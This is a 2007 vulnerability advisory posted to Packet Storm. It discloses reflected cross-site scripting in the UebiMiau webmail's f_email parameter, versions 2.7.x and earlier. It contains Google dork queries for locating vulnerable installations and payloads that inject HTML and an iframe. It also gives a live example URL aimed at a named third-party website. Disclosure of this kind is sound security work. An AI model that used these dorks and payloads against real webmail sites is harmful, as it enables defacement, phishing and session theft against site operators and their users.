Home / os / winme

uebimiau27x-xss.txt

Posted on 05 October 2007

Hi Packet Storm; I want to report a vulnerability of type XSS in a Webmail, this is UebiMiau. Thank you. +===================================================================+ + UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities + +===================================================================+ Author(s): www.nullcode.com.ar Product: UebiMiau WebMail. Web: http://www.uebimiau.org/download.php Versions: 2.7.x (or less) Date: 03/10/2007 TESTED ON: UebiMiau WebMail 2.7.x (or less) ---------- [x] Apache/1.3.33 (Debian GNU/Linux) - PHP/4.3.10-19 [+] Apache/1.3.37 (Unix) - PHP/4.4.4 [+] Apache/1.3.37 (Unix) - PHP/5.2.1 [+] Apache/1.3.37 (Unix) - PHP/5.2.2 [+] Apache/2.0.53 (Fedora) - PHP/4.3.11 [+] Apache/2.0.55 (Unix) - PHP/5.2.0 [x] Apache/2.2.3 (Debian) - PHP/4.4.4-8+etch4 GOOGLE DORKS: ------------ [+] intext:Powered by UebiMiau! [+] intitle:uebimiau [+] inurl:/webmail/index.php?lid= EXPLOIT: -------- For example...after the variable "email" index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=[XSS] index.php?lid=de&tid=modern_blue&f_user=&six=&f_email=="><h1>Null Code Services</h1>="><iframe%20src=http://www.nullcode.com.ar/></iframe> EXAMPLE (on line): ------------------ http://www.coffeeswirls.com/webmail/index.php?lid=6&tid=1&f_user=&six=&f_email==%22%3E%3Ch1%3ENull%20Code%20Services%3C/h1%3E=%22%3E%3Ciframe%20src=http://www.google.com/%3E%3C/iframe%3E GREETS: str0ke, and to the same ones always from www.nullcode.com.ar ;) NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +===================================================================+ + UebiMiau <=2.7.x (XSS) Multiple Remote Vulnerabilities + +===================================================================+ -- Maximiliano Soler. Reports & Review Code. Null Code Services. www.nullcode.com.ar ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.

 

TOP